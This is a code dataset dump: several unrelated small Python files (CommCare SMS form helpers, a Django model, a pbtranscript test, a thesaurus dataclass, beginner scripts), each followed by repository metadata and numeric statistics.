jwt = JWT(app,authenticate,identity) | 33.133333 | 71 | 0.7666 | 67 | 497 | 5.58209 | 0.477612 | 0.069519 | 0.085562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007009 | 0.138833 | 497 | 15 | 72 | 33.133333 | 0.866822 | 0 | 0 | 0 | 0 | 0 | 0.058233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.333333 | 0.083333 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
34a3c5979c5216c22bb261f3a724f1a3a6ea121a | 799 | py | Python | corehq/apps/smsforms/util.py | rochakchauhan/commcare-hq | aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/smsforms/util.py | rochakchauhan/commcare-hq | aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236 | [
"BSD-3-Clause"
] | 1 | 2021-06-02T04:45:16.000Z | 2021-06-02T04:45:16.000Z | corehq/apps/smsforms/util.py | rochakchauhan/commcare-hq | aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236 | [
"BSD-3-Clause"
] | null | null | null | from dimagi.utils.couch import CriticalSection
from corehq.apps.receiverwrapper.util import submit_form_locally
def form_requires_input(form):
"""
Returns True if the form has at least one question that requires input
"""
for question in form.get_questions([]):
if question["tag"] not in ("trigger", "label", "hidden"):
return True
return False
def process_sms_form_complete(session, form):
result = submit_form_locally(form, session.domain, app_id=session.app_id, partial_submission=False)
session.submission_id = result.xform.form_id
session.mark_completed(True)
session.save()
def critical_section_for_smsforms_sessions(contact_id):
return CriticalSection(['smsforms-sessions-lock-for-contact-%s' % contact_id], timeout=5 * 60)
| 30.730769 | 103 | 0.738423 | 107 | 799 | 5.308411 | 0.570093 | 0.035211 | 0.059859 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004491 | 0.163955 | 799 | 25 | 104 | 31.96 | 0.845808 | 0.08761 | 0 | 0 | 0 | 0 | 0.081346 | 0.051893 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0.071429 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
34d35a78f92c8bdc372877964e8913cfb9da9911 | 197 | py | Python | Areatriangulo.py | ChristianSalas1234567/salas-yupanqui | 36fdbe3ebc51cd73f62870fcc8b646ad98133ae7 | [
"Apache-2.0"
] | 1 | 2021-04-22T12:34:37.000Z | 2021-04-22T12:34:37.000Z | Areatriangulo.py | ChristianSalas1234567/salas-yupanqui | 36fdbe3ebc51cd73f62870fcc8b646ad98133ae7 | [
"Apache-2.0"
] | null | null | null | Areatriangulo.py | ChristianSalas1234567/salas-yupanqui | 36fdbe3ebc51cd73f62870fcc8b646ad98133ae7 | [
"Apache-2.0"
] | null | null | null | #variables de entrada
print("area del triangulo")
#datos de entrada
B=int(input("ingrese base:"))
H=int(input("ingrese haltura:"))
#proceso
area=(B*H)/2
#datos de salida
print("el area es: ", area) | 21.888889 | 32 | 0.71066 | 33 | 197 | 4.242424 | 0.606061 | 0.128571 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 0.111675 | 197 | 9 | 33 | 21.888889 | 0.794286 | 0.294416 | 0 | 0 | 0 | 0 | 0.433824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
34e3c30f1eecc4a83cc074f6ae2e470a42d8d132 | 1,058 | py | Python | cride/users/models/exchanges.py | albertoaldanar/betmatcherAPI | c0590025efd79f4e489f9c9433b17554ea6ba23f | [
"MIT"
] | null | null | null | cride/users/models/exchanges.py | albertoaldanar/betmatcherAPI | c0590025efd79f4e489f9c9433b17554ea6ba23f | [
"MIT"
] | 7 | 2020-06-05T20:53:27.000Z | 2022-03-11T23:47:12.000Z | cride/users/models/exchanges.py | albertoaldanar/betmatcherAPI | c0590025efd79f4e489f9c9433b17554ea6ba23f | [
"MIT"
] | null | null | null | from django.db import models
#Utilities
from cride.utils.models import BetmatcherModel
class Exchange(BetmatcherModel):
user = models.ForeignKey(
"users.User",
on_delete = models.CASCADE,
related_name = "user"
)
prize = models.ForeignKey(
"users.Prize",
on_delete = models.CASCADE,
related_name = "prize"
)
adress = models.CharField(max_length = 60, blank = True, null = True)
phone = models.CharField(max_length = 25, blank = True, null = True)
email = models.CharField(max_length = 25, blank = True, null = True)
cp = models.CharField(max_length = 25, blank = True, null = True)
country = models.CharField(max_length = 25, blank = True, null = True)
city = models.CharField(max_length = 25, blank = True, null = True)
full_name = models.CharField(max_length = 55, blank = True, null = True)
state = models.CharField(max_length = 25, blank = True, null = True)
date = models.DateTimeField(
"event_date",
help_text = "Date of the event"
)
def __str__(self):
return self.user.username
| 28.594595 | 74 | 0.6862 | 138 | 1,058 | 5.123188 | 0.355072 | 0.169731 | 0.203678 | 0.27157 | 0.455446 | 0.455446 | 0.364922 | 0.364922 | 0.364922 | 0 | 0 | 0.018868 | 0.198488 | 1,058 | 36 | 75 | 29.388889 | 0.814858 | 0.008507 | 0 | 0.074074 | 0 | 0 | 0.054441 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0.037037 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
34e7cf6e1775685d6271aef6702b1730ac2e95bc | 1,956 | py | Python | tests/unit/test_bad_cluster.py | ylipacbio/pbtranscript | 6b4ef164f191ffd4201feb62b951d9eeac3315b6 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/test_bad_cluster.py | ylipacbio/pbtranscript | 6b4ef164f191ffd4201feb62b951d9eeac3315b6 | [
"BSD-3-Clause"
] | null | null | null | tests/unit/test_bad_cluster.py | ylipacbio/pbtranscript | 6b4ef164f191ffd4201feb62b951d9eeac3315b6 | [
"BSD-3-Clause"
] | 1 | 2021-02-26T10:08:09.000Z | 2021-02-26T10:08:09.000Z |
# XXX verification for bug 30828 - runs ice_pbdagcon on a spurious cluster
# and checks that it discards the resulting all-N consensus sequence
import subprocess
import tempfile
import unittest
import os.path as op
from pbcore.io import FastaReader
CLUSTER_FA = """\
>m54007_151222_230824/47383194/334_64_CCS
CATTGAAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTTTC
>m54007_151222_230824/28640158/287_60_CCS
CAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGGCGTAAACATGGTGGGAACGTACTTTGACTGCGCTGCAAGAAATGGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAAAACAAACATCATTCGCTGGATTTAGACTACTACTGCACGACCGACGTCGACACAAGACATTCTCTGAAAGGTAATTGACGTGGACGTTTC
>m54007_151222_230824/49611437/382_58_CCS
ACTGAACTACGGGTCAGCTTCCCCATTTGAAGTCATGTAGTGGTTGTCTACTTTTTCATTGAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTGTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTT"""
class TestBadCluster(unittest.TestCase):
def setUp(self):
self.cluster_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name
with open(self.cluster_fa, "w") as fa_out:
fa_out.write(CLUSTER_FA)
def test_ice_pbdagcon_bad_cluster(self):
out_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name
prefix = op.splitext(out_fa)[0]
args = [
"python", "-m", "pbtranscript.ice_pbdagcon",
self.cluster_fa,
prefix,
"c5006"
]
assert subprocess.call(args) == 0
with FastaReader(out_fa) as fa_out:
self.assertEqual(len([rec for rec in fa_out]), 0)
if __name__ == "__main__":
unittest.main()
| 44.454545 | 327 | 0.812883 | 152 | 1,956 | 10.210526 | 0.559211 | 0.028995 | 0.034794 | 0.043814 | 0.055412 | 0.055412 | 0 | 0 | 0 | 0 | 0 | 0.059965 | 0.130368 | 1,956 | 43 | 328 | 45.488372 | 0.85244 | 0.071063 | 0 | 0 | 0 | 0 | 0.557088 | 0.534473 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.064516 | false | 0 | 0.16129 | 0 | 0.258065 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
34f18dca2b35de2acae03f31c1e789e6be8e839f | 756 | py | Python | mwthesaurus/model.py | PederHA/mwthesaurus | c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2 | [
"MIT"
] | null | null | null | mwthesaurus/model.py | PederHA/mwthesaurus | c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2 | [
"MIT"
] | null | null | null | mwthesaurus/model.py | PederHA/mwthesaurus | c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import List
from itertools import chain
@dataclass
class Word:
word: str
wordtype: str
shortdef: List[str] = field(default_factory=list)
synonyms: List[str] = field(default_factory=list)
antonyms: List[str] = field(default_factory=list)
stems: List[str] = field(default_factory=list)
@classmethod
def from_response(cls, r: dict) -> object:
obj = cls.__new__(cls)
obj.word = r["meta"]["id"]
obj.wordtype = r["fl"]
obj.shortdef = r["shortdef"]
obj.synonyms = list(chain.from_iterable(r["meta"]["syns"]))
obj.antonyms = list(chain.from_iterable(r["meta"]["ants"]))
obj.stems = r["meta"]["stems"]
return obj
| 30.24 | 67 | 0.640212 | 98 | 756 | 4.826531 | 0.357143 | 0.059197 | 0.10148 | 0.160677 | 0.363636 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218254 | 756 | 24 | 68 | 31.5 | 0.800338 | 0 | 0 | 0 | 0 | 0 | 0.054233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
34f87e0983bc87b776a41bf8fa6bd6191f64154d | 437 | py | Python | exemplo_47_inspect.py | alef123vinicius/Estudo_python | 30b121d611f94eb5df9fbb41ef7279546143221b | [
"Apache-2.0"
] | null | null | null | exemplo_47_inspect.py | alef123vinicius/Estudo_python | 30b121d611f94eb5df9fbb41ef7279546143221b | [
"Apache-2.0"
] | null | null | null | exemplo_47_inspect.py | alef123vinicius/Estudo_python | 30b121d611f94eb5df9fbb41ef7279546143221b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 16 15:35:53 2021
@author: alef
"""
import os.path
# modulo de instropecção amigável
import inspect
print('Objeto: ', inspect.getmodule(os.path))
print('Classe?', inspect.isclass(str))
# Lista todas as funções que existem em os.path
print('Membros: ')
for name, struct in inspect.getmembers(os.path):
if inspect.isfunction(struct):
print(name) | 17.48 | 48 | 0.681922 | 63 | 437 | 4.730159 | 0.746032 | 0.080537 | 0.073826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038674 | 0.171625 | 437 | 25 | 49 | 17.48 | 0.78453 | 0.393593 | 0 | 0 | 0 | 0 | 0.094118 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.